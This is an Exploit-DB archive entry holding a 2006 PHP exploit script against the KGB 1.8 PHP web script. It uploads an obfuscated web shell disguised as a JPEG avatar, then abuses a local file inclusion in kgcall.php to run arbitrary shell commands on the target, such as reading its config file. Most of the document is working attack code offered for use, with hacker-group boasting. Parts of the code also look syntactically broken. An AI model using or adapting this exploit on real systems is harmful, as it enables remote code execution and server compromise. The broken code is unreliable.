KGB 1.87 - Local File Inclusion / Remote Code Execution

EDB-ID:

2447


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2006-09-28


#!/usr/bin/php -q -d short_open_tag=on

<?
$devilteam = "

::::::::: :::::::::: :::   ::: ::::::::::: :::    
:+:  :+: :+:    :+:   :+:   :+:   :+:    
+:+  +:+ +:+    +:+   +:+   +:+   +:+    
+#+  +:+ +#++:++#  +#+   +:+   +#+   +#+    
+#+  +#+ +#+     +#+  +#+   +#+   +#+    
#+#  #+# #+#     #+#+#+#    #+#   #+#    
######### ##########   ###   ########### ########## 
::::::::::: ::::::::::   :::   ::::  :::: 
  :+:   :+:     :+: :+:  +:+:+: :+:+:+ 
  +:+   +:+     +:+  +:+ +:+ +:+:+ +:+ 
  +#+   +#++:++#  +#++:++#++: +#+ +:+ +#+ 
  +#+   +#+    +#+   +#+ +#+    +#+ 
  #+#   #+#    #+#   #+# #+#    #+# 
  ###   ########## ###   ### ###    ### 
	
	
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-  - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- KGB 1.8+ <= 1.8 full (Local Inclusion) Remote Code Execution Exploit
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: KGB 1.8+ 1.8 full
- [Script site: http://www.kgb.xs.com.pl/
- [Download script: http://skrypty.webpc.pl/pobierz205.html

+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-     Find by: Kacper (a.k.a Rahim)
+
-  DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
-     Contact: kacper1964@yahoo.pl
-            or
-      http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
-         SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-      Z Dedykacja dla osoby,
-     bez ktorej nie mogl bym zyc...
-      K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";


/*
Szybka instrukcja jak exploit dziala :)

skrypt KGB 1.8+ jest podatny na local inclusion, poniewaz, 
znajdujemy w pliku uploadzdj.php dzieki ktoremu mozemy uploadowac jakis obrazek, o wielkosci nie wiekszej niz 90kb,

natomiast w pliku kgcall.php znajdziemy kod:
...
<?
include("kgengine/".$engine);
?>
...


Czyli po uploadowaniu nowego avatara/obrazka (ktorym jest nasz skrypt) o nazwie devilteam.jpg

mozemy uzyc local include:

http://www.kgbskrypt/folder_z_kgb/kgcall.php?engine=../zdjecia/devilteam.jpg?cmd=ls -la
No i mamy go! :)

Pozdrawiam Kacper

Jesli masz jakiekolwiek pytania to zapraszam na kanal IRC: 72.20.18.6:6667 #devilteam

*/print $devilteam;
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd options\r\n";
echo "host:   target server (ip/hostname)\r\n";
echo "path:   path to KGB\r\n";
echo "cmd:    a shell command\r\n";
echo "Options:\r\n";
echo "  -p[port]:  specify a port other than 80\r\n";
echo "  -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n";
echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i<=strlen($string)-1; $i++)
 {
  if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  {$result.=" .";}
  else
  {$result.=" ".$string[$i];}
  if (strlen(dechex(ord($string[$i])))==2)
  {$exa.=" ".dechex(ord($string[$i]));}
  else
  {$exa.=" 0".dechex(ord($string[$i]));}
  $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
  $ock=fsockopen(gethostbyname($host),$port);
  if (!$ock) {
   echo 'No response from '.$host.':'.$port; die;
  }
 }
 else {
	$c = preg_match($proxy_regex,$proxy);
  if (!$c) {
   echo 'Not a valid proxy...';die;
  }
  $parts=explode(':',$proxy);
  echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  $ock=fsockopen($parts[0],$parts[1]);
  if (!$ock) {
   echo 'No response from proxy...';die;
	}
 }
 fputs($ock,$packet);
 if ($proxy=='') {
  $html='';
  while (!feof($ock)) {
   $html.=fgets($ock);
  }
 }
 else {
  $html='';
  while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
   $html.=fread($ock,1);
  }
 }
 fclose($ock);
 #debug
 #echo "\r\n".$html;
}
function make_seed()
{
  list($usec, $sec) = explode(' ', microtime());
  return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


$shell=
chr(0x3c).chr(0x3f).chr(0x70).chr(0x68).chr(0x70).
chr(0x20).chr(0x6f).chr(0x62).chr(0x5f).chr(0x63).
chr(0x6c).chr(0x65).chr(0x61).chr(0x6e).chr(0x28).
chr(0x29).chr(0x3b).chr(0x65).chr(0x63).chr(0x68).
chr(0x6f).chr(0x22).chr(0x44).chr(0x45).chr(0x56).
chr(0x49).chr(0x4c).chr(0x20).chr(0x54).chr(0x45).
chr(0x41).chr(0x4d).chr(0x20).chr(0x68).chr(0x34).
chr(0x63).chr(0x6b).chr(0x20).chr(0x79).chr(0x30).
chr(0x75).chr(0x22).chr(0x3b).chr(0x69).chr(0x6e).
chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).
chr(0x28).chr(0x22).chr(0x6d).chr(0x61).chr(0x78).
chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).
chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).
chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).
chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).
chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x24).
chr(0x5f).chr(0x47).chr(0x45).chr(0x54).chr(0x5b).
chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).
chr(0x5d).chr(0x29).chr(0x3b).chr(0x64).chr(0x69).
chr(0x65).chr(0x3b).chr(0x3f).chr(0x3e);
srand(make_seed());
$evil="devilteam.jpg";
$data='
  -----------------------------ZGV2aWx0ZWFt--
  Content-Disposition: form-data; name="plik"; filename=".$evil."
	Content-Type: image/jpeg\r\n\r\n";
  '.$shell.'
  -----------------------------ZGV2aWx0ZWFt--
  Content-Disposition: form-data; name="";
  
  Wyslij zdjecie
  -----------------------------ZGV2aWx0ZWFt--
  ';
  $packet ="POST ".$p."kgcall.php?engine=uploadzdj.php HTTP/1.1\r\n";
  $packet.="User-Agent: Googlebot/2.1\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Referer: http://".$host.$path."kgcall.php?engine=uploadzdj.php\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=-----------------------------ZGV2aWx0ZWFt--\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.=$data;
	$packet.="Connection: Close\r\n";
  show($packet);
  sendpacketii($packet);
	
$packet ="GET ".$p."kgcall.php?engine=../zdjecia/devilteam.jpg&cmd=".$cmd."%00" HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"56789"))
{
 $temp=explode("56789",$html);
 echo $temp[1];
 echo "\r\nExploit work :)\r\n";
 echo "\r\nDEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
 echo "\r\nWe are The best Polish Hackers :)\r\n";
 die;
}
}
?>

# milw0rm.com [2006-09-28]